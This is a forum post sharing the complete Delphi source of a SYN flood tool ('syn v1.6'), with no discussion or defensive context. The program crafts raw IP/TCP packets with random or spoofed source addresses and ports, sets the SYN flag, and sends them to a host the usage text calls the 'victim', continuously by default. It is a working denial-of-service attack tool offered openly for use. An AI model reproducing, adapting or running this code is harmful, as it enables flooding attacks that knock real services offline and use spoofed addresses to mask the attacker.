Jump to content
Gonzalez

[Snippet] Delphi Syn Flooder

By Gonzalez, in Programare

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 


program syn;

{$APPTYPE CONSOLE}

uses
  Windows, Winsock;

const
  Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 +
                 'http://www.loranbase.com'#13#10;

type
  TPorts = array of Word;
  TSynOptions = packed record
    Delay: Cardinal;
    DstPorts: TPorts;
    SockAddr: TSockAddrIn;
    Num: Cardinal;
    RandomSeek: Integer;
    Sended: Cardinal;
    Socket: TSocket;
    SpoofIP: Cardinal;
    SrcPorts: TPorts;
  end;

  WordArray = ^TWordArray;
  TWordArray = array [0..0] of Word;

  PIPhdr = ^TIPhdr;
  TIPhdr = packed record
    ip_verlen: Byte;
    ip_tos: Byte;
    ip_len: Word;
    ip_id: Word;
    ip_off: Word;
    ip_ttl: Byte;
    ip_p: Byte;
    ip_sum: Word;
    ip_src: Cardinal;
    ip_dst: Cardinal;
  end;

  PTCPhdr = ^TTCPhdr;
  TTCPhdr = packed record
    tcp_src   : Word;
    tcp_dst   : Word;
    tcp_seq   : Cardinal;
    tcp_ack   : Cardinal;
    tcp_off   : Byte;
    tcp_flags : Byte;
    tcp_win   : Word;
    tcp_sum   : Word;
    tcp_urp   : Word;
  end;

  Ppseudohdr_tcp = ^Tpseudohdr_tcp;
  Tpseudohdr_tcp = packed record
    saddr     : Cardinal;
    daddr     : Cardinal;
    zero      : Byte;
    protocol  : Byte;
    length    : Word;
    tcphdr    : TTCPhdr;
  end;

const
  Len = 40;

var
  Buf: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr = @Buf[0];
  TCPhdr: PTCPhdr = @Buf[20];
  WSAData: TWSAData;
  i, j: integer;
  UseDelay: Boolean;
  SynOpt: TSynOptions;
  LastUpdate: Cardinal = 0;

function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;
begin
  Result := Force or ((GetTickCount - LastUpdate) >= DelayValue);
  if Result then LastUpdate := GetTickCount;
end;

function StrtoInt(const S: string): integer;
var
  E: integer;
begin
  Val(S, Result, E);
end;

function InttoStr(const Value: integer): string;
var
  S: string[11];
begin
  Str(Value, S);
  Result := S;
end;

function StrToIntDef(const S: string; Default: integer): integer;
var
  E: integer;
begin
  Val(S, Result, E);
  if E <> 0 then Result := Default;
end;

function ExtractFileName(const Path: string): string;
var
  i, L: integer;
  Ch: Char;
begin
  L := Length(Path);
  for i := L downto 1 do
  begin
    Ch := Path[i];
    if (Ch = '\') or (Ch = '/') then
    begin
      Result := Copy(Path, i + 1, L - i);
      Break;
    end;
  end;
end;

function CheckSum(data: WordArray; size: Integer): Word;
var
  i, sum: Integer;
begin
  sum := 0;
  i := 0;
  while size > 1 do begin
    Inc(sum, data^[i]);
    Dec(size, 2);
    Inc(i);
  end;
  if size <> 0 then
    Inc(sum, data^[i]);
  sum := (sum shr 16) + (sum and $ffff);
  Inc(sum, sum shr 16);
  Result := not sum;
end;

function ValidPort(const Port: string): Boolean;
var
  prt: Integer;
begin
  prt := StrtoIntDef(Port, -1);
  Result := (prt > -1) and (prt < 65536); // a valid port must be between -1 and 65536
end;

function GetPorts(Ports: string): TPorts;

  procedure AddPort(const Port: string);
  begin
    if ValidPort(Port) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := StrtoInt(Port);
    end
    else
      Writeln('Skipping invalid port: ' + Port);
  end;

var
  i: Integer;
  S: string;
begin
  i := Pos(',', Ports);
  while i > 0 do
  begin
    S := Copy(Ports, 1, i - 1);
    AddPort(S);
    Delete(Ports, 1, i);
    i := Pos(',', Ports);
  end;
  AddPort(Ports);
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range;
end;

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket;
begin
  SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SynOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

var
  SeudoBuf: array [0..31] of Char;

procedure SendSyn(const sport, dport: Word);

  procedure SendSyn_FillIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_tos := 0;
    IPhdr.ip_len := htons(Len);
    IPhdr.ip_id := GetRandomValue(High(Word)) + 1;
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 6; // 6 = TCP
    if SynOpt.SpoofIP = 0 then
      IPhdr.ip_src := GetRandomIP
    else
      IPhdr.ip_src := SynOpt.SpoofIP;
    IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr;
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  end;

  procedure SendSyn_FillTCPhdr;
  var
    PSeudohdr: Ppseudohdr_tcp;
  begin
    if sport = 0 then
      TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_src := htons(sport);
    if dport = 0 then
      TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_dst := htons(dport);
    TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_flags := $02; // 0x02 = syn flag
     TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1;
    TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1;
    FillChar(SeudoBuf, Sizeof(SeudoBuf), 0);
    PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum
    PSeudohdr.saddr := IPhdr.ip_src;        // we must calculate it with a pseudo header
    PSeudohdr.daddr := IPhdr.ip_dst;
    PSeudohdr.protocol := 6;
    PSeudohdr.length := htons(20);
    PSeudohdr.tcphdr := TCPhdr^;
    TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);
end;

begin
  FillChar(Buf, Len, 0);
  SendSyn_FillIPhdr;
  SendSyn_FillTCPhdr;
  Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr));
end;

procedure SetDefaultOptions;
begin
  SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SetLength(SynOpt.DstPorts, 1);
  SynOpt.DstPorts[0] := 0;
  SynOpt.SockAddr.sin_family := AF_INET;
  SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
  SetLength(SynOpt.SrcPorts, 1);
  SynOpt.SrcPorts[0] := 0;
end;

procedure SetParams;
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then Continue;
    case Ch of
      'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1)));
      'p':
        begin
          SynOpt.DstPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.DstPorts) = 0 then
          begin
            Writeln('No valid ports found on the dst port list');
            Halt(0);
          end;
        end;
      's':
        begin
          SynOpt.SrcPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.SrcPorts) = 0 then
          begin
            Writeln('No valid ports found on the src port list');
            Halt(0);
          end;
        end;
      'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string); 
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S:    Spoof host                         (0 is random (default))'#13#10 +
        '  -p:    Comma separated list of dest ports (0 is random (default))'#13#10 +
        '  -s:    Comma separated list of src ports  (0 is random (default))'#13#10 +
        '  -n:    Num of packets                     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                      (default 0)'#13#10
       );
  Halt(0);
end;

begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);
  FillChar(SynOpt, Sizeof(SynOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 1 then
      SetParams;
    UseDelay := SynOpt.Delay > 0;
    repeat
      for i := 0 to High(SynOpt.DstPorts) do
      begin
        for j := 0 to High(SynOpt.SrcPorts) do
        begin
          SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]);
          if UseDelay then
            Sleep(SynOpt.Delay);
        end;
      end;
      Inc(SynOpt.Sended);
      if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended)));
    until
      SynOpt.Sended = SynOpt.Num;
  finally
    CloseSocket(SynOpt.Socket);
    WSACleanUp;
  end;
end.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...